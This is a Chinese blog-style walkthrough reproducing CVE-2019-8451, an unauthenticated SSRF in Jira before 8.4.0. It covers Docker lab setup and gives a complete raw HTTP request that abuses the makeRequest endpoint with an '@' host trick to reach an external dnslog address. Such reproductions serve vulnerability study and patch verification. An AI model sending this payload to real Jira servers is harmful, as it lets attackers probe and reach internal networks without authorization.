温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

发布时间:2021-12-10 15:38:49 来源:亿速云 阅读:306 作者:柒染 栏目:大数据

这期内容当中小编将会给大家带来有关Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

0x00 简介


JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

0x01 漏洞概述


Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。(来自奇安信CERT)

0x02 影响范围


Jira < 8.4.0

0x03 环境搭建


在线靶场

开放时间(当前-9月29日20:00)

获取方式(完成任意一个):

1、将本文转发至朋友圈并配文字,截图发至公众号内

2、联系作者,五元红包

自行搭建

使用docker进行搭建,执行以下命令开启环境

docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

访问ip:8080进行安装

下图选择第二个

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

继续即可

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

点击next,后面漏了两张图

去生成JIRA使用许可证

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

生成之后找到License Key,回到页面填上License Key继续安装

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

至此,安装完毕。

0x04 漏洞利用


先访问ip:8080,然后刷新抓包

将数据包替换为如下Poc:

GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2

其中ip替换为目标ip,共三处

@后面改为你的dnslog的地址

repeater发包

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

去dnslog中刷新查看结果,可以看到有流量经过

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

如果访问未开放端口,结果是这样的:

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

上述就是小编为大家分享的Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI